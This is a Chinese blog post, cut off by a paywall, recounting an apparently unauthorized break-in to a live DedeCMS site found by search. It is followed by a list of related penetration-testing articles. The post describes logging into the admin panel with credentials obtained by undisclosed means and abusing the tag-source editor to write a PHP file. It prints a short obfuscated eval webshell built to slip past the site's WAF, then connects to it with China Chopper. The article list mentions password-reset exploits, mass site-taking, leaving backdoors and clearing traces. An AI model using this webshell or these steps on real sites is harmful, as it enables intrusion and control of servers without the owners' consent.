一次特别的DedeCMS站点渗透

最新推荐文章于 2024-05-01 12:00:00 发布
最新推荐文章于 2024-05-01 12:00:00 发布
阅读量4.8k 收藏 4
点赞数 1
文章标签: web安全 服务器安全 web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zfying22/article/details/81172469
版权

 一系列故事的开端:

这是搜到的一个Dede站点的后台

路径为/dede

 获得到该站点的用户名以及密码后(这里不具体说明),输入用户名和密码之后就进入了后台,并且下意识的打开了文件管理器

不过管理员也不是等闲之辈,早已卸载该模块

于是,我找到了另一处可以生成PHP文件的地方

在”标签源码管理“这里可以创建PHP脚本文件

去掉默认的代码,写入eval代码,点击保存,文件会存放在 /include/taglib 目录下

注:由于服务器有WAF,PHP脚本进行了简单的混淆

<?php
$a='b';
$b=$_POST['x'];
eval($$a);
?>

于是菜刀连接之:

刚开始看到其他站点目录无权限时,并没有想

最低0.47元/天 解锁文章
moon_fairyr
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php拿站,一次特别DedeCMS拿站经历
weixin_30488255的博客
03-10 218
一系列故事的开端:这是搜到的一个Dede站点的后台路径为/dede获得到该站点的用户名以及密码后(这里不具体说明),输入用户名和密码之后就进入了后台,并且下意识的打开了文件管理器不过管理员也不是等闲之辈,早已卸载该模块于是,我找到了另一处可以生成PHP文件的地方在”标签源码管理“这里可以创建PHP脚本文件去掉默认的代码,写入eval代码,点击保存,文件会存放在 /include/taglib 目录...
一次旁站信息泄露的dedecms站点渗透
zhangge3663的博客
11-26 892
今天又是准备划水认真工作的一天,没想到一到公司领导就甩了个站过来,这可能就是打工人吧 话不多说来看看站,先信息收集一波 初步测试目标站点 打开进去是一个类似购物商城的地方,没有什么特殊的点,想要操作基本都要进行登录,中间件是nginx 再看看插件,惊喜来了,是dedecms 先直接盲打一波后台地址/dede 直接404...... 再看看好歹有前台,先注册个用户 再查看最后更新时间 可以知道是dedecms v5.7 sp2的版本 这个版本之后有前台管理员密码重置漏洞和任意密码重
渗透实战:dedeCMS任意用户密码重置到内网getshell
最新发布
wangluoanquan111的博客
05-01 618
DedeCMS 是一个基于 PHP 和 MySQL 的开源 CMS 系统,它是国内很多网站使用的 CMS 系统之一。在使用 DedeCMS的过程中,我们需要重视其安全性,因为安全问题可能会导致网站数据泄露、网站被黑、系统被入侵等严重后果。本文将介绍如何进行 DedeCMS 安全测试。DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。
渗透测试实战--dedecms漏洞复现
qq_45070118的博客
08-18 5555
实验设备:一台windows服务器,一台kali,一台windows客户端 在虚拟机WIN7上使用phpstudy搭站(解压文件将文件放置在phpstudy配置文件WWW中),使用物理机进行攻击,WIN7 IP为192.168.10.5 物理机安装jdk,建立java环境,由此来运行菜刀 网页链接是WWW后的路径(http://ip/dedecms/uploads) 根据文件存放位置来定在物理机...
渗透测试-地基篇-Webshell-织梦dedecms框架(八)
qq_34801745的博客
11-25 1526
** 渗透测试-地基篇-Webshell-织梦dedecms框架(八) ** 作者:大余 时间:2020-11-25 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣
DeDeCMS前台任意用户密码修改漏洞渗透复现(使用Burp suite)
鲸落
10-17 753
主要是在自己的电脑里搭建织梦网站,并对其进行漏洞渗透 流程搭建网站安装DeDeCMS使用Burp suite获取链接 搭建网站 ~搭建网站的场合 使用PHPstudy软件进行网站的搭建,phpstudy下载直接百度官网即可。 按照图示流程即可,需要注意的是根目录是 phpstudy根目录下的WWW目录。 记住自己填写的域名 安装DeDeCMS DeDeCM官网 选择UTF8下载 下载后解压会出现两个文件夹 安装的具体操作可以查看docs内的readme文档,如下 二、程序安装使用 1.下载程序解压到
渗透Webpack等站点_从此更加优雅.pdf
08-11
对应站点JS文件提取 主要JS文件的提取及过滤 对异步JS进行处理及爆破 API及其参数批量提取 对应平台API全量提取 特定API参数模糊提取 快速模糊化漏洞检测 针对所能检测的七类主流漏洞进行快速批量化检测
使用CakePHP快速打造Web站点(一)
03-03
简介:CakePHP是一种用PHP构建Web站点的辅助工具,它很稳定,可直接用于生产及快速开发。“使用CakePHP快速打造Web站点”系列教程向您展示如何使用CakePHP构建在线产品目录。第1部分主要介绍如何安装并运行CakePHP,...
一次渗透网站获得权限的过程.doc
10-07
本文将详细介绍一次渗透网站获得权限的过程,涵盖了网站扫描、SQL 注入、数据库文件下载、密码解密等多个方面的知识点。 一、前言 NETWORK 安全问题越来越受到重视,很多企业都在网上开展业务,发布了动态可以和...
红队渗透打点工具-FindUpload
03-07
1. **批量URL扫描**:FindUpload能够处理大量的URL列表,一次性对多个目标站点进行扫描。这大大减少了测试人员手动查找的时间,使他们能更专注于分析和利用发现的安全漏洞。 2. **快速发现文件上传点**:文件上传...
一天能拿1000多个站的dedeBUG 漏洞
04-09
一天能拿1000多个站的dedeBUG 漏洞
利用搜索引擎批量拿站
03-31
利用搜索引擎批量拿站利用搜索引擎批量拿站利用搜索引擎批量拿站
dedecms漏洞组合拳拿站(渗透笔记)
热门推荐
一个安全研究员
07-13 1万+
如题
120.网络安全渗透测试—[CMS后台 getwebshell]—[织梦dedecms5.7后台 getwebshell]
qwsn
07-10 2793
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)进入后台:模块–>文件管理器---->上传文件---->shell.php,内容为 (2)访问:\shell.php(1)进入后台:模块–>文件管理器–>新建文件–>写入wshell.php,内容为 (2)访问:\wshell.php (3)访问:\shell0.php (1)进入后台:系统–>系统基本参数–>核心配置–>专题最大的节点数或FTP端口写入 (2)访问:data\config.cache.inc.php....
三层内网渗透
xjh8023的博客
08-26 1194
内网拓扑图 第一层 首先入口网站是一个dedecms 拿到这个网站先上扫描器 果然有rebots.txt,访问 http://10.10.9.110//ffffffffllllllllllaaaaaaaagggggg22222222222.txt flag2 flag{f784234649d7ef161229349d1d76ba8d} 接着我们想要拿到网站的shell,在漏洞库中发现可以利用dedeCMS后台上传getshell漏洞(CNVD-2018-01221) 参考链接:https://blo
WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1)
午夜安全
11-17 4309
WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1) 在Windows server2008服务器上安装phpstudy,将dedecms的网站源码复制到C:\phpStudy\PHPTutorial\WWW\下,启动phpstudy,运行模式选择系统服务,安装成功后,可以在浏览器访问服务器ip地址,如下所示:访问如下安装地址,提示删除install/install_lock.txt。删除后,可以正常访问,之后按照提示安装完成即可。安装完成后,访问首页。...
一次织梦cms渗透测试
weixin_30776545的博客
08-08 1132
一次织梦cms渗透测试 0x01 前言 本次测试的整个流程:枚举用户名 - 针对性暴破 - 登录后台 - 后台编辑php文件getshell。 0x02 过程 1、登录功能模块存在用户名枚举缺陷,利用此权限先枚举出用户名 2、登录功能模块无验证码,通过枚举出的用户名暴力破解出相应密码。并登录后台(dedecms v57) 3、开始遇到坑了。...
web站点渗透测试思路
04-28
Web站点渗透测试思路一般包括以下几个步骤: 1.信息收集:收集目标站点的信息,包括IP地址、域名、服务器类型、开放端口等。 2.漏洞扫描:使用扫描工具对目标站点进行漏洞扫描,寻找可能存在的漏洞。 3.漏洞利用:将扫描到的漏洞进行利用,获取站点的敏感信息或者控制站点。 4.提权:获取站点管理员权限,进一步深入站点的内部。 5.维持权限:在站点中留下后门或者其他手段,以便后续再次进入站点。 6.清理痕迹:在完成渗透攻击之后,尽可能地清理痕迹,避免被发现。 需要注意的是,进行渗透测试需要遵守相关法律法规,且需要获得站点所有者的授权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值